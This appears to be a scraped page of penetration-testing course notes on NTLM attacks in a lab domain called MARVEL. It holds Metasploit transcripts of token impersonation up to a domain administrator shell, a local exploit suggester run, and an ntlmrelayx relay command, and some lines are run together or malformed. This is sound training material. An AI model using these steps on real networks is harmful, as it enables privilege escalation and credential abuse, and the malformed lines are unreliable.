Week 9: NTLM
NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
Important Readings
Notes
CrackMapExec and psexec



NTLM Relay

Last updated
NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more




Last updated
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > pslocate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support